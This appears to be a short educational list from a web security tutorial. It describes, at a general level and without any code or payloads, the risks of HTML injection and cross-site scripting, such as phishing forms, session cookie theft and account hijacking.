1. Fake Content / UI Manipulation: HTML Injection allows attackers to alter how a webpage looks, which can mislead users and damage user trust.
2. Phishing Attacks: Attackers can insert fake login forms or messages to trick users into revealing personal data or login credentials.
3. Website Defacement: Malicious HTML can change visual elements or messages, embarrassing the organization and damaging its brand.
4. Data Leakage: Links or forms injected into a page can secretly send user information to attacker-controlled sites.
5. Escalation to XSS: HTML injection can be a precursor to Cross-Site Scripting if JavaScript is injected or executed indirectly.
1. Credential Theft: XSS can be used to steal session cookies, authentication tokens, or login credentials from users.
2. Account Hijacking: With stolen cookies or tokens, attackers can impersonate users and access private accounts or data.
3. Malware Delivery: XSS can load malicious scripts or redirect users to exploit kits or infected websites.
4. Unauthorized Actions (CSRF Bypass): Attackers can execute actions on behalf of users without their knowledge if CSRF protections are weak.
5. Full Site Compromise (Admin Panel Attacks): If an admin views a malicious payload, attackers can gain control of the backend or site settings.
6. Reputation and Legal Risks: Exploited XSS vulnerabilities lead to data breaches, lawsuits, and loss of customer trust.